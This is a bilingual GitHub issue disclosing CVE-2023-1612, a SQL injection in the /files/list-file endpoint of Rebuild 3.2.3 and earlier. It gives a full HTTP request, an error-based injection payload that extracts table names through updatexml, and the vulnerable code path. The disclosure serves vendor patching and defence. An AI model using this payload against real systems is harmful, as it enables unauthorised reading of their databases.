Headline
CVE-2023-1612: SQL injection vulnerability exists in the /files/list-file interface of the rebuild system · Issue #598 · getrebuild/rebuild
A vulnerability, which was classified as critical, was found in Rebuild up to 3.2.3. This affects an unknown part of the file /files/list-file. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-223743.
版本 / Version
<=3.2.3
什么问题 / What’s the problem
在rebuild系统的/files/list-file接口中存在SQL注入漏洞
There is a SQL injection vulnerability in the /files/list-file interface of the rebuild system.
如何复现此问题 / How to reproduce this problem****功能点 / Function points
请求信息 / Request message:
GET /files/list-file?entry=1&sort=&q=1&pageNo=1&pageSize=40&_=1679238611579 HTTP/1.1
Host: 192.168.0.102:18080
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Referer: http://192.168.0.102:18080/files/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rb.lastFilesPath=attachment; _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679238611.9.1.1679238613.0.0.0
Connection: close
攻击载荷 / payload:
%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)+and%201%20=%20?%20–+
漏洞复现 / Vulnerability recurrence
系统环境 (操作系统/MySQL版本/浏览器等) / System environment (OS/MySQL/Browser etc)
Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome
说明 / Suggested description
sql injection vulnerability exists in rebuild <=3.2.3
在rebuild系统小于3.2.3版本中存在SQL注入漏洞
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
未能合法检查参数从而导致sql注入漏洞.
漏洞类型 / Vulnerability Type
SQLi
产品供应商 / Vendor of Product
https://github.com/getrebuild/rebuild
受影响的产品代码库 / Affected Product Code Base
<=3.2.3
受影响组件 / Affected Component
/files/list-file
攻击方式 / Attack Type
Remote
漏洞成因 / Cause of vulnerability
In the com.rebuild.web.files.FileListController#listFile() method, obtain the user’s input and splice it into SqlWhere
在com.rebuild.web.files.FileListController#listFile()方法中,获取用户的输入,并拼接至SqlWhere中
The StringEscapeUtils.escapeSql method is used here to process user input, which poses a risk of being bypassed.
此处使用StringEscapeUtils.escapeSql方法对用户输入进行处理,此种方法存在绕过的风险。
Then insert SqlWhere into the final query statement and bring it into the query.
随后将SqlWhere插入到最终的查询语句中,并带入到查询中。
An attacker can implement a SQL injection vulnerability when passing in malicious SQL statements.
当攻击者传入恶意的sql语句时,即可实现SQL注入漏洞。
The end,thanks!